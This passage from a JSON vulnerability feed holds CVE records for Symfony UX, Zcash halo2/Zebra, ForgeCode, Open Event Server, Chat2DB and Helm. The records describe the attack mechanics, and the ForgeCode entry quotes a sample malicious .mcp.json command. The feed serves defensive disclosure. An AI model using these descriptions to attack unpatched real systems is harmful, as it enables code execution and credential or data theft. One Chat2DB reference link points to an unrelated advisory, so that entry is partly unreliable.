Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-200"}]}],"references":[{"url":"https://github.com/symfony/ux/commit/725ab3d40689c91ff19ad2d01940a30007769214","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v2.36.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v3.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/security/advisories/GHSA-946h-jp5c-8fvh","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49212","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:15.930","lastModified":"2026-07-17T18:17:16.713","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Symfony UX is a JavaScript ecosystem for Symfony. From 2.8.0 until 2.36.0 and 3.1.0, the HMAC computed by Symfony\\UX\\LiveComponent\\LiveComponentHydrator covered only sorted prop key/value pairs and did not include the component name, the slot identifier (props vs propsFromParent), or request context, allowing a signed blob minted for one component or slot to be replayed in another and set a read-only prop on a target component. This issue is fixed in versions 2.36.0 and 3.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"symfony","product":"ux","versions":[{"version":">= 3.0.0, < 3.1.0","status":"affected"},{"version":"< 2.36.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:48:30.843991Z","id":"CVE-2026-49212","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-345"}]}],"references":[{"url":"https://github.com/symfony/ux/commit/a224b5af3e2e33ee14ac71356ae0e0877900a81c","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v2.36.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v3.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/security/advisories/GHSA-34w5-c283-j9fg","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49215","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:16.060","lastModified":"2026-07-17T19:17:16.100","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Symfony UX is a JavaScript ecosystem for Symfony. From 2.22.0 until 2.36.0 and 3.1.0, Symfony\\UX\\LiveComponent\\EventListener\\LiveComponentSubscriber::isLiveComponentRequest() gates #[LiveAction] invocations on Accept: application/vnd.live-component+html, but the Accept header is CORS-safelisted and cross-origin fetch() can set it without preflight, allowing forged cross-origin #[LiveAction] requests against a victim session when applications use SameSite=None, credentials: 'include', a permissive cookie policy, or a same-origin pivot. This issue is fixed in versions 2.36.0 and 3.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"symfony","product":"ux","versions":[{"version":">= 3.0.0, < 3.1.0","status":"affected"},{"version":">= 2.22.0, < 2.36.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:24:08.463081Z","id":"CVE-2026-49215","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-352"}]}],"references":[{"url":"https://github.com/symfony/ux/commit/aed7493db2b4b7bf1f9c79b33cda544f06904b27","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v2.36.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v3.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/security/advisories/GHSA-4m4j-hmqq-3gxm","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-49216","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:16.190","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Symfony UX is a JavaScript ecosystem for Symfony. From 2.2.0 until 2.36.0 and 3.1.0, the Stimulus controller in symfony/ux-autocomplete renders AJAX response items in _createAutocompleteWithRemoteData() by interpolating the text field into HTML template literals (<div>${item[labelField]}</div>) rather than text, allowing attacker-controlled markup from user-supplied dropdown values to execute in the browser of any user who opens an autocomplete widget backed by the same data. This issue is fixed in versions 2.36.0 and 3.1.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"symfony","product":"ux","versions":[{"version":">= 3.0.0, < 3.1.0","status":"affected"},{"version":"< 2.36.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://github.com/symfony/ux/commit/842ae54bc74de389299f975f01aafae272cb0019","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v2.36.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/releases/tag/v3.1.0","source":"security-advisories@github.com"},{"url":"https://github.com/symfony/ux/security/advisories/GHSA-mwqm-4fw3-cjvr","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54496","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T17:17:16.620","lastModified":"2026-07-17T18:45:20.713","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad 5.0.0, halo2_gadgets 0.5.0, orchard 0.14.0, zcash_primitives 0.28.0, and zcashd 6.20.0, the variable-base scalar multiplication gadget in halo2_gadgets/src/ecc/chip/mul/incomplete.rs used assign_advice() for the base point without a copy constraint tying it to the actual base, allowing a malicious prover to produce a valid proof for an Orchard Action with an under-constrained base point and bypass the diversified-address-integrity check that binds pk_d, g_d, ivk, the nullifier (nf), and the spend validating key (ak) to the note being spent. This issue is fixed in zebrad 5.0.0, halo2_gadgets 0.5.0, orchard 0.14.0, zcash_primitives 0.28.0, and zcashd 6.20.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"ZcashFoundation","product":"zebra","versions":[{"version":"< 5.0.0","status":"affected"}]},{"vendor":"zcash","product":"halo2_gadgets","versions":[{"version":"< 0.5.0","status":"affected"}]},{"vendor":"zcash","product":"orchard","versions":[{"version":"< 0.14.0","status":"affected"}]},{"vendor":"zcash","product":"librustzcash","versions":[{"version":"< 0.28.0","status":"affected"}]},{"vendor":"zcash","product":"zcash","versions":[{"version":"< 6.20.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L","baseScore":9.3,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":4.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:23:34.445671Z","id":"CVE-2026-54496","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-345"}]}],"references":[{"url":"https://github.com/ZcashFoundation/zebra/releases/tag/v5.0.0","source":"security-advisories@github.com"},{"url":"https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-ww9q-8r59-xv46","source":"security-advisories@github.com"},{"url":"https://github.com/zcash/halo2/releases/tag/halo2_gadgets-0.5.0","source":"security-advisories@github.com"},{"url":"https://github.com/zcash/librustzcash/releases/tag/zcash_primitives-0.28.0","source":"security-advisories@github.com"},{"url":"https://github.com/zcash/orchard/releases/tag/0.14.0","source":"security-advisories@github.com"},{"url":"https://github.com/zcash/zcash/releases/tag/v6.20.0","source":"security-advisories@github.com"},{"url":"https://zfnd.org/zebra-4-5-3-and-5-0-0-emergency-soft-fork-and-nu6-2-activation","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-57860","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T17:17:16.777","lastModified":"2026-07-17T18:28:39.220","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"ForgeCode (tailcallhq/forgecode), an AI pair-programming CLI, automatically loads and executes the MCP servers defined in a repository's .mcp.json file on startup without user confirmation. A malicious repository can supply a crafted .mcp.json whose mcpServers entries specify arbitrary command and args values (for example, command: bash with args: ['-c', 'touch /tmp/pwned']). When a user runs the forge CLI inside a cloned untrusted repository, the specified commands are spawned with the invoking user's privileges, resulting in arbitrary code execution. This provides a reliable initial-access and persistence primitive against developers who evaluate untrusted repositories with ForgeCode."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"tailcallhq","product":"forgecode","defaultStatus":"affected","packageURL":"pkg:npm/forgecode","versions":[{"version":"2.11.1","versionType":"git","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.4,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:45:24.963875Z","id":"CVE-2026-57860","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-829"}]}],"references":[{"url":"https://github.com/tailcallhq/forgecode","source":"disclosure@vulncheck.com"},{"url":"https://github.com/tailcallhq/forgecode/commit/68ca3a3a26c73c38a700453d3d021b5bbdc15dbd","source":"disclosure@vulncheck.com"},{"url":"https://github.com/tailcallhq/forgecode/issues/3022","source":"disclosure@vulncheck.com"},{"url":"https://github.com/tailcallhq/forgecode/issues/3252","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/forgecode-arbitrary-code-execution-via-unvetted-mcp-json-in-untrusted-repository","source":"disclosure@vulncheck.com"},{"url":"https://github.com/tailcallhq/forgecode/issues/3022","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-63101","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T17:17:17.283","lastModified":"2026-07-17T19:17:19.147","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"disclosure@vulncheck.com","tags":["unsupported-when-assigned"]}],"descriptions":[{"lang":"en","value":"Open Event Server through 1.19.1 contains a missing authentication vulnerability that allows unauthenticated attackers to export the complete member roster of any group, including email addresses, names, join dates, and roles, by submitting requests to the group followers CSV export endpoint which lacks any authentication decorator. Attackers can enumerate sequential group IDs via brute-force, trigger an export via the unauthenticated POST endpoint, then poll the unauthenticated task status endpoint until completion to retrieve a download URL containing the full member CSV."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"fossasia","product":"open-event-server","defaultStatus":"affected","repo":"https://github.com/fossasia/open-event-server","packageURL":"pkg:github/fossasia/open-event-server","versions":[{"version":"0","lessThanOrEqual":"1.19.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:24:23.081296Z","id":"CVE-2026-63101","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-306"}]}],"references":[{"url":"https://github.com/geo-chen/oss/blob/main/open-event-server.md","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/open-event-server-unauthenticated-member-roster-export-via-csv-export-endpoint","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63307","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T17:17:17.433","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Chat2DB before 5.3.0 contains an insecure direct object reference vulnerability in the GET /api/connection/datasource/{id} endpoint. The handler calls dataSourceService.queryExistent(id, ...) without an ownership check and returns the decrypted password field, allowing any authenticated non-admin user to enumerate datasource IDs and read the plaintext database credentials of datasources owned by other users."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OtterMind","product":"Chat2DB","defaultStatus":"unaffected","repo":"https://github.com/OtterMind/Chat2DB","versions":[{"version":"0","lessThan":"5.3.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/OtterMind/Chat2DB/issues/1839","source":"disclosure@vulncheck.com"},{"url":"https://github.com/OtterMind/Chat2DB/releases/tag/v5.3.0","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/forgecode-arbitrary-code-execution-via-unvetted-mcp-json-in-untrusted-repository","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63308","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T17:17:17.577","lastModified":"2026-07-17T18:28:53.707","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Helm through 4.2.3, fixed in commit ba6c9a2, contains a denial of service vulnerability in the Files.Lines template helper in pkg/engine/files.go that allows attackers to trigger an index out of range panic by including zero-length byte slices in chart files. Attackers can include empty files in Helm charts to cause deterministic render failures across template, install, upgrade, lint, and SDK Engine.Render operations."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"helm","product":"helm","defaultStatus":"unaffected","repo":"https://github.com/helm/helm","packageURL":"pkg:golang/helm.sh/helm/v4","versions":[{"version":"0","lessThanOrEqual":"4.2.3","versionType":"semver","status":"affected"},{"version":"ba6c9a29efa7bf9198dad6a5ec12b4fb30c96017","versionType":"git","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:25:36.932375Z","id":"CVE-2026-63308","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA 